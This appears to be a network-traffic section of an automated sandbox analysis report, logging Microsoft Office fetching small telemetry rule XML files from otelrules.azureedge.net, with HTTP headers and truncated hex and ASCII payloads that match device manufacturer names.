                                  2024-11-25 23:29:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  48192.168.2.44979613.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:22 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:23 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:23 GMT
                                  Content-Type: text/xml
                                  Content-Length: 415
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                  ETag: "0x8DC582B988EBD12"
                                  x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232923Z-174f7845968l4kp6hC1EWRe8840000000uzg00000000003f
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  49192.168.2.44979813.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:24 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:25 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:25 GMT
                                  Content-Type: text/xml
                                  Content-Length: 494
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                  ETag: "0x8DC582BB8972972"
                                  x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232925Z-174f7845968swgbqhC1EWRmnb40000000ung000000000bb6
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:25 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  50192.168.2.44980113.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:24 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:25 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:25 GMT
                                  Content-Type: text/xml
                                  Content-Length: 427
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                  ETag: "0x8DC582BA909FA21"
                                  x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232925Z-174f7845968j6t2phC1EWRcfe80000000ut000000000085x
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  51192.168.2.44980013.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:25 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:25 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:25 GMT
                                  Content-Type: text/xml
                                  Content-Length: 472
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                  ETag: "0x8DC582B9D43097E"
                                  x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232925Z-174f784596886s2bhC1EWR743w0000000us00000000004f4
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  52192.168.2.44980213.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:25 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:25 UTC470INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:25 GMT
                                  Content-Type: text/xml
                                  Content-Length: 486
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                  ETag: "0x8DC582B92FCB436"
                                  x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232925Z-174f7845968glpgnhC1EWR7uec0000000ut00000000008kt
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:25 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  53192.168.2.44980313.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:27 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:27 UTC470INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:27 GMT
                                  Content-Type: text/xml
                                  Content-Length: 423
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                  ETag: "0x8DC582BB7564CE8"
                                  x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232927Z-174f7845968pf68xhC1EWRr4h80000000uxg0000000005mq
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:27 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  54192.168.2.44980413.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:27 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:27 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:27 GMT
                                  Content-Type: text/xml
                                  Content-Length: 478
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                  ETag: "0x8DC582B9B233827"
                                  x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232927Z-174f7845968n2hr8hC1EWR9cag0000000u600000000009az
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:27 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  55192.168.2.44980513.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:27 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:27 UTC470INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:27 GMT
                                  Content-Type: text/xml
                                  Content-Length: 404
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                  ETag: "0x8DC582B95C61A3C"
                                  x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232927Z-174f7845968xlwnmhC1EWR0sv80000000uag000000000c70
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:27 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  56192.168.2.44980613.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:27 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:27 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:27 GMT
                                  Content-Type: text/xml
                                  Content-Length: 468
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                  ETag: "0x8DC582BB046B576"
                                  x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232927Z-174f7845968j6t2phC1EWRcfe80000000utg0000000007qu
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:27 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  57192.168.2.44979913.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:27 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:28 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:28 GMT
                                  Content-Type: text/xml
                                  Content-Length: 420
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                  ETag: "0x8DC582B9DAE3EC0"
                                  x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232928Z-174f7845968psccphC1EWRuz9s0000000uy000000000076m
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:28 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  58192.168.2.44980713.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:29 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:29 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:29 GMT
                                  Content-Type: text/xml
                                  Content-Length: 400
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                  ETag: "0x8DC582BB2D62837"
                                  x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232929Z-174f78459684bddphC1EWRbht40000000ue0000000000682
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
